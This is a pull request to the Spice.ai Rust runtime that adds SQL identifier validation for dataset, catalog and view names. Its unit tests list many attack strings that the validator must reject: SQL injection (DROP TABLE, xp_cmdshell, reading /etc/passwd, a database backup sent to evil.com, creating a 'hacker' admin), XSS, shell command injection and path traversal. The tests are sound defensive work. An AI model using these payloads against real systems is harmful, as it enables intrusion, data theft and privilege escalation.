### PR TITLE
Validate identifiers for component names

### DIFF
--- a/crates/runtime/src/component/catalog.rs
+++ b/crates/runtime/src/component/catalog.rs
@@ -19,6 +19,8 @@ use snafu::prelude::*;
 use spicepod::component::{catalog as spicepod_catalog, params::Params};
 use std::collections::HashMap;
 
+use super::validate_identifier;
+
 #[derive(Debug, Clone)]
 pub struct Catalog {
     pub provider: String,
@@ -64,6 +66,8 @@ impl TryFrom<spicepod_catalog::Catalog> for Catalog {
                     .context(crate::ErrorConvertingGlobSetToRegexSnafu)?,
             );
         }
+
+        validate_identifier(&catalog.name).context(crate::ComponentSnafu)?;
 
         Ok(Catalog {
             provider: provider.to_string(),

--- a/crates/runtime/src/component/dataset.rs
+++ b/crates/runtime/src/component/dataset.rs
@@ -27,6 +27,8 @@ use std::{collections::HashMap, fmt::Display, str::FromStr, sync::Arc, time::Dur
 
 use crate::dataaccelerator::get_accelerator_engine;
 
+use super::validate_identifier;
+
 #[derive(Debug, Snafu)]
 pub enum Error {
     #[snafu(display(
@@ -153,6 +155,8 @@ impl TryFrom<spicepod_dataset::Dataset> for Dataset {
             .acceleration
             .map(acceleration::Acceleration::try_from)
             .transpose()?;
+
+        validate_identifier(&dataset.name).context(crate::ComponentSnafu)?;
 
         let table_reference = Dataset::parse_table_reference(&dataset.name)?;
 

--- a/crates/runtime/src/component/mod.rs
+++ b/crates/runtime/src/component/mod.rs
@@ -1,3 +1,204 @@
+/*
+Copyright 2024 The Spice.ai OSS Authors
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+     https://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+use datafusion::sql::sqlparser::{
+    dialect::{Dialect, GenericDialect},
+    tokenizer::{Token, Tokenizer},
+};
+use snafu::prelude::*;
+
+#[derive(Debug, Snafu)]
+pub enum Error {
+    #[snafu(display("Component name is not a valid identifier"))]
+    InvalidIdentifier,
+}
+
 pub mod catalog;
 pub mod dataset;
 pub mod view;
+
+/// Validates an identifier to ensure it represents a valid component name.
+///
+/// Uses the sqlparser-rs library to ensure it represents only a valid SQL identifier.
+///
+/// Only allow SQL words and periods, and ensure that periods are not consecutive.
+///
+/// Allowed:
+/// - `valid_identifier`
+/// - `test.one.two`
+/// - `"test".foo.bar`
+///
+/// Disallowed:
+/// - `sneaky\"; CREATE TABLE foo (id int); -- putting comments!`
+/// - `validate your inputs!`
+pub fn validate_identifier(identifier: &str) -> Result<(), Error> {
+    let dialect: Box<dyn Dialect> = Box::new(GenericDialect);
+    let mut tokenizer = Tokenizer::new(dialect.as_ref(), identifier);
+    let Ok(tokens) = tokenizer.tokenize() else {
+        return Err(Error::InvalidIdentifier);
+    };
+
+    if tokens.is_empty() {
+        return Err(Error::InvalidIdentifier);
+    }
+
+    let mut expect_period = false;
+    for token in tokens {
+        if expect_period && matches!(token, Token::Period) {
+            expect_period = false;
+            continue;
+        } else if expect_period {
+            return Err(Error::InvalidIdentifier);
+        }
+
+        let Token::Word(word) = token else {
+            return Err(Error::InvalidIdentifier);
+        };
+
+        if word.value.is_empty() {
+            return Err(Error::InvalidIdentifier);
+        }
+
+        expect_period = true;
+    }
+
+    // Ensure the last token is not a period
+    if !expect_period {
+        return Err(Error::InvalidIdentifier);
+    }
+
+    Ok(())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_validate_identifier() {
+        // Valid identifiers
+        assert!(validate_identifier("valid_identifier").is_ok());
+        assert!(validate_identifier("test.one.two").is_ok());
+        assert!(validate_identifier("\"test\".foo.bar").is_ok());
+        assert!(validate_identifier("a1").is_ok());
+        assert!(validate_identifier("_underscore").is_ok());
+        assert!(validate_identifier("camelCase").is_ok());
+        assert!(validate_identifier("PascalCase").is_ok());
+        assert!(validate_identifier("snake_case_123").is_ok());
+        assert!(validate_identifier("\"quoted.identifier\"").is_ok());
+        assert!(validate_identifier("db.schema.table").is_ok());
+        assert!(validate_identifier("schema.table").is_ok());
+        assert!(validate_identifier("valid@identifier").is_ok());
+
+        // Invalid identifiers
+        assert!(
+            validate_identifier("sneaky\"; CREATE TABLE foo (id int); -- putting comments!")
+                .is_err()
+        );
+        assert!(validate_identifier("validate your inputs!").is_err());
+        assert!(validate_identifier("").is_err());
+        assert!(validate_identifier(" ").is_err());
+        assert!(validate_identifier("1invalid").is_err());
+        assert!(validate_identifier("invalid-identifier").is_err());
+        assert!(validate_identifier("invalid:identifier").is_err());
+        assert!(validate_identifier("invalid/identifier").is_err());
+        assert!(validate_identifier("invalid\\identifier").is_err());
+        assert!(validate_identifier("invalid.").is_err());
+        assert!(validate_identifier(".invalid").is_err());
+        assert!(validate_identifier("invalid..identifier").is_err());
+        assert!(validate_identifier("\"unclosed.quote").is_err());
+        assert!(validate_identifier("closed.\"quote\"unclosed.\"quote").is_err());
+
+        // SQL injection attack attempts
+        assert!(validate_identifier("users; DROP TABLE users;").is_err());
+        assert!(validate_identifier("admin'--").is_err());
+        assert!(validate_identifier("user' OR '1'='1").is_err());
+        assert!(validate_identifier("user\"; SELECT * FROM secrets; --").is_err());
+        assert!(validate_identifier("user'); DELETE FROM users; --").is_err());
+        assert!(validate_identifier("user\\\"; TRUNCATE TABLE logs; --").is_err());
+        assert!(
+            validate_identifier("user/**/UNION/**/SELECT/**/password/**/FROM/**/users").is_err()
+        );
+        assert!(validate_identifier(
+            "user' UNION SELECT NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES; --"
+        )
+        .is_err());
+        assert!(validate_identifier("user' AND 1=CONVERT(int,(SELECT @@version)); --").is_err());
+        assert!(validate_identifier("user' AND 1=1 WAITFOR DELAY '0:0:10'--").is_err());
+        assert!(validate_identifier("user'); EXEC xp_cmdshell('net user'); --").is_err());
+        assert!(validate_identifier(
+            "user' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"
+        )
+        .is_err());
+        assert!(validate_identifier("user' ORDER BY 1--").is_err());
+        assert!(validate_identifier("user' GROUP BY 1--").is_err());
+        assert!(validate_identifier("user' HAVING 1=1--").is_err());
+        assert!(validate_identifier(
+            "user'; INSERT INTO users (username, password) VALUES ('hacker', 'password');--"
+        )
+        .is_err());
+        assert!(validate_identifier(
+            "user'; UPDATE users SET admin = true WHERE username = 'hacker';--"
+        )
+        .is_err());
+        assert!(validate_identifier(
+            "user'; ALTER TABLE users ADD COLUMN backdoor VARCHAR(255);--"
+        )
+        .is_err());
+        assert!(validate_identifier("user'; CREATE TRIGGER malicious_trigger AFTER INSERT ON users BEGIN /* malicious code */;--").is_err());
+        assert!(validate_identifier("user'; LOAD_FILE('/etc/passwd');--").is_err());
+        assert!(validate_identifier("user'; SELECT @@datadir;--").is_err());
+        assert!(validate_identifier("user' UNION SELECT NULL,NULL,SLEEP(5)--").is_err());
+        assert!(validate_identifier("user' AND (SELECT COUNT(*) FROM users) > 0--").is_err());
+        assert!(validate_identifier(
+            "user' AND SUBSTRING((SELECT password FROM users LIMIT 1), 1, 1) = 'a'--"
+        )
+        .is_err());
+        assert!(validate_identifier("user'; DECLARE @cmd VARCHAR(255); SET @cmd = 'dir c:'; EXEC master..xp_cmdshell @cmd;--").is_err());
+        assert!(validate_identifier(
+            "user'; BACKUP DATABASE master TO DISK = '\\\\evil.com\\share\\backup.bak';--"
+        )
+        .is_err());
+        assert!(validate_identifier("user' UNION ALL SELECT table_name, column_name, NULL FROM information_schema.columns--").is_err());
+        assert!(
+            validate_identifier("user'; CREATE USER hacker IDENTIFIED BY 'password';--").is_err()
+        );
+        assert!(
+            validate_identifier("user'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';--").is_err()
+        );
+
+        // XSS-like attempts
+        assert!(validate_identifier("<script>alert('XSS')</script>").is_err());
+        assert!(validate_identifier("javascript:alert('XSS')").is_err());
+        assert!(validate_identifier(
+            "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="
+        )
+        .is_err());
+
+        // Command injection attempts
+        assert!(validate_identifier("user; cat /etc/passwd").is_err());
+        assert!(validate_identifier("user && whoami").is_err());
+        assert!(validate_identifier("user | netstat -an").is_err());
+        assert!(validate_identifier("user` echo vulnerable`").is_err());
+
+        // Null byte injection
+        assert!(validate_identifier("user\0malicious").is_err());
+
+        // Path traversal attempts
+        assert!(validate_identifier("../../../etc/passwd").is_err());
+        assert!(validate_identifier("..\\..\\..\\Windows\\System32").is_err());
+    }
+}

--- a/crates/runtime/src/component/view.rs
+++ b/crates/runtime/src/component/view.rs
@@ -19,7 +19,7 @@ use snafu::prelude::*;
 use spicepod::component::view as spicepod_view;
 use std::fs;
 
-use super::dataset::Dataset;
+use super::{dataset::Dataset, validate_identifier};
 
 #[derive(Debug, Clone, PartialEq)]
 pub struct View {
@@ -31,6 +31,8 @@ impl TryFrom<spicepod_view::View> for View {
     type Error = crate::Error;
 
     fn try_from(view: spicepod_view::View) -> Result<Self, Self::Error> {
+        validate_identifier(&view.name).context(crate::ComponentSnafu)?;
+
         let table_reference = Dataset::parse_table_reference(&view.name)?;
 
         let sql = if let Some(view_sql) = &view.sql {

--- a/crates/runtime/src/lib.rs
+++ b/crates/runtime/src/lib.rs
@@ -273,6 +273,9 @@ pub enum Error {
 
     #[snafu(display("Unable to create directory: {source}"))]
     UnableToCreateDirectory { source: std::io::Error },
+
+    #[snafu(display("{source}"))]
+    ComponentError { source: component::Error },
 }
 
 pub type Result<T, E = Error> = std::result::Result<T, E>;


### PR DESCRIPTION
## 🗣 Description

Adds validation for component (dataset, catalog, views) names that get registered in DataFusion to ensure they conform to valid SQL identifiers.

```rust
/// Validates an identifier to ensure it represents a valid component name.
///
/// Uses the sqlparser-rs library to ensure it represents only a valid SQL identifier.
///
/// Only allow SQL words and periods, and ensure that periods are not consecutive.
///
/// Allowed:
/// - `valid_identifier`
/// - `test.one.two`
/// - `"test".foo.bar`
///
/// Disallowed:
/// - `sneaky\"; CREATE TABLE foo (id int); -- putting comments!`
/// - `validate your inputs!`
```
